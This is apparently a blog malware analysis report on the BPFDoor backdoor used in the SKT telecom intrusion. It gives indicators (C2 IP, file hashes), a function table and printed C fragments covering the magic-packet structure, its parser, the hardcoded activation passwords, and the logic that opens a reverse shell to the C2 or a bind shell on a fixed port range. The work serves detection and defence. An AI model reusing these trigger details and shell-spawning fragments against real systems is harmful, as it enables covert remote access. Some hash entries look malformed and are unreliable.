599 words
3 minutes
MAL-250608-01-01
2025-06-08
Malware Research
analysis
/
c

MAL-250608-01-01#

MetadataInformation
Report IDMAL-250608-01-01
Incident Date2022-06/15 - 2025-04/22
Report Date2025-06/08
Malware NameBPFDoor
Version01
Analyst@therustymate
OrganizationPrivate
SeverityCritical
StatusPublic/Draft
Malware TypeRAT
Detection Date2025-04/18 06:09 PM
Affected SystemsLinux/HSS
CVEN/A
TagsBackdoor, ISP Hacking

Incident Report#

In the recent SKT cyberattack, threat actors gained initial access via a web shell from the external network, then penetrated into the internal network and deployed BPFdoor malware to compromise Linux-based HSS (Home Subscriber Server) systems. Approximately 9.8GB of sensitive data (ex. IMSI) was exfiltrated during the intrusion.

Incident Metadata#

MetadataInformation
Command & Control (C2) Server165.232.174[.]130
Indicators of Compromise165.232.174[.]130
Infection VectorWebShell
Persistence MechanismsBPF-based direct kernel code execution
Raw socket-based custom packet trigger mechanism
Payload DescriptionBackdoor
Network BehaviorCustom Packet Communication

File Names#

File NameSize
dbus-srv34KB
inode26239428KB
dbus-srv34KB
dbus-srv34KB
dbus-srv34KB
File_in_Inode_#190066728KB
gm2,063KB
rad22KB

Hashes#

File NameHash TypeHash
hpasmmldMD5a47d96ffe446a431a46a3ea3d1ab4d6e
SHA1e6ccf59c2b7f6bd0f143cde356f60d2217120ad2
SHA256c7f693f7f85b01a8c0e561bd369845f40bff423b0743c7aa0f4c323d9133b5d4
smartadmMD5227fa46cf2a4517aa1870a011c79eb54
SHA1466527d15744cdbb6e1d71129e1798acbe95764d
SHA2563f6f108db37d18519f47c5e4182e5e33cc795564f286ae770aa03372133d15c4
hald-addon-volumeMD5f4ae0f1204e25a17b2adbbab838097bd
SHA1e3399ea3ebbbd47c588ae807c4bd429f6eef8deb
SHA25695fd8a70c4b18a9a669fec6eb82dac0ba6a9236ac42a5ecde270330b66f51595
dbus-srv-bin.txtMD5714165b06a462c9ed3d145bc56054566
SHA12ca9a29b139b7b2993cabf025b34ead957dee08b
SHA256aa779e83ff5271d3f2d270eaed16751a109eb722fca61465d86317e03bbf49e4
dbus-srvMD53c54d788de1bf6bd2e7bc7af39270540
SHA167a3a1f8338262cd9c948c6e55a22e7d9070ca6c
SHA256925ec4e617adc81d6fcee60876f6b878e0313a11f25526179716a90c3b743173
inode262394MD5fbe4d008a79f09c2d46b0bcb1ba926b3
SHA10f12ab32bac3f4db543f702d58368f20b6f5d324
SHA25629564c19a15b06dd5be2a73d7543288f5b4e9e6668bbd5e48d3093fb6ddf1fdb
dbus-srvMD5c2415a464ce17d54b01fc91805f68967
SHA14b6824ed764822dc422384cec89d45bbc682ef09
SHA256be7d952d37812b7482c1d770433a499372fde7254981ce2e8e974a67f6a088b5
dbus-srvMD5aba893ffb1179b2a0530fe4f0daf94da
SHA1213dbb5862a19a423e5b10789a07ee163ab71969
SHA256027b1fed1b8213b86d8faebf51879ccc9b1afec7176e31354fbac695e8daf416
dbus-srvMD5e2c2f1a1fbd66b4973c0373200130676
SHA17e7234c5e94a92dd8f43632aca1ac60db7d96d56
SHA256a2ea82b3f5be30916c4a00a7759aa6ec1ae6ddadc4d82b3481640d8f6a325d59
File_in_Inode_#1900667MD5dc3361ce344917da20f1b8cb4ae0b31d
SHA1c2717777ba2cb9a698889fca884eb7650144f32e
SHA256e04586672874685b019e9120fcd1509d68af6f9bc513e739575fc73edefd511d
gmMD5a778d7ad5a23a177f2d348a0ae4099772c09671e
SHA1c2717777ba2cb9a698889fca884eb7650144f32e
SHA256adfdd11d69f4e971c87ca5b2073682d90118c0b3a3a9f5fbbda872ab1fb335c6
radMD50bcd4f14e7d8a3dc908b5c17183269a4
SHA1b631d5ed10d0b2c7d9c39f43402cccde7f3cb5ea
SHA2567c39f3c3120e35b8ab89181f191f01e2556ca558475a2803cb1f02c05c830423

References#

CAUTION

Some references may not be fully reliable.

TitleLink
KISA (boho.or.kr)here
Namu Wiki (namu.wiki)here
korea.krhere

Analysis#

Function/Symbol Table#

FunctionHex LocationDescription
xchg()UnknownExchange a and b in memory
rc4_init()UnknownInitialize RC4 encryption algorithm
rc4()UnknownPerform RC4 encryption
cwrite()UnknownCipher writer
cread()UnknownCipher reader
remove_pid()UnknownUnlink (delete) pid_path file
setup_time()UnknownFile timestamp manipulation (1225394236 sec)
terminate()UnknownProcess termination event
on_terminate()UnknownSIGTERM (Process termination) event handler
init_signal()UnknownProcess termination event setup
sig_child()UnknownChild process termination event setup/handler
ptym_open()UnknownSpawn a pseudo terminal master (virtual terminal)
ptys_open()UnknownSpawn a pseudo terminal slave (PTYM input object)
open_tty()UnknownCreate a teletypewriter (terminal interface)
try_link()UnknownSpawn a socket client object (reverse shell)
mon()UnknownReturn "1" to the remote server (failed signal)
set_proc_name()UnknownManipulate a process name through prctl syscall
to_open()UnknownCheck the access permision for the shell
logon()UnknownPassword verification and command handler
packet_loop()UnknownTCP, UDP, ICMP packet parser and handler
b()UnknownSpawn a socket bind server (random port)
w()UnknownAccept connections
getshell()UnknownDisable firewall and spawn a bind server
shell()UnknownCore command handler
main()UnknownEntry point with configs

Magic Packet#

The following code is the C structure of the magic packet used to activate BPFDoor.

struct magic_packet{
    unsigned int    flag;
    in_addr_t       ip;
    unsigned short  port;
    char   pass[14];
} __attribute__ ((packed));
FieldField TypeLengthDescription
flagunsigned int4 bytesNot Used
ipin_addr_t4 bytesC2 Server IPv4 Address
portunsigned short2 bytesC2 Server Port Number
passchar [14]14 bytesPassword/Command

The following C code parses custom magic packets delivered over TCP, UDP, and ICMP protocols. This indicates that BPFDoor is capable of establishing remote connections through packets using TCP, UDP, and ICMP.

switch(ip->ip_p) {
    case IPPROTO_TCP:
        tcp = (struct sniff_tcp*)(buff+14+size_ip);
        size_tcp = TH_OFF(tcp)*4;
        mp = (struct magic_packet *)(buff+14+size_ip+size_tcp);
        break;
    case IPPROTO_UDP:
        udp = (struct sniff_udp *)(ip+1);
        mp = (struct magic_packet *)(udp+1);
        break;
    case IPPROTO_ICMP:
        pbuff = (char *)(ip+1);
        mp = (struct magic_packet *)(pbuff+8);
        break;
    default:
        break;
}

Login Password#

The login passwords received by the malware are as follows:

  • justforfun
  • socket
{0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun
{0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00}; // socket
data = [0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00]
for i in data:
    print(chr(i), end='')


>>> justforfun




data2 = [0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00]
for i in data2:
    print(chr(i), end='')


>>> socket

If the transmitted value is “justforfun”, the malware establishes a TCP reverse shell to connect back to the C2 server.

  • The function try_link() returns a TCP client socket object, which is stored in the variable scli.

  • This scli object is then passed as an argument to the shell() function.

If the transmitted value is “socket”, the malware sets up a bind shell server, listening for incoming connections.

  • The function getshell() calls another function b(), which returns a TCP listening socket (bind server).

  • The resulting socket is stored in the variable sockfd, which is then passed as an argument to the shell() function.

In summary, the command structure of this malware operates as follows:

  • justforfun command → Spawns a reverse shell
  • socket command → Spawns a bind shell
cmp = logon(mp->pass); // Check the command
switch(cmp) {
    case 1:
        strcpy(sip, inet_ntoa(ip->ip_src));
        getshell(sip, ntohs(tcp->th_dport));
        break;
    case 0:
        scli = try_link(bip, mp->port);
        if (scli > 0)
                shell(scli, NULL, NULL);
        break;
    case 2:
        mon(bip, mp->port);
        break;
}

Port Range#

When spawning a bind shell, the malware selects a random port within the range 42391 to 43390.

for (port = 42391; port < 43391; port++) { // 42391 - 43390
    my_addr.sin_port = htons(port);
    if( bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr)) == -1 ){
        continue;
    }
    if( listen(sock_fd,1) == 0 ) {
        *p = port;
        return sock_fd;
    }
    close(sock_fd);
}
return -1;
MAL-250608-01-01
https://fuwari.vercel.app/posts/mal-250608-01-01/
Author
The Rusty
Published at
2025-06-08
License
CC BY-NC-SA 4.0
MAL-250610-01-01
© 2025 The Rusty. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari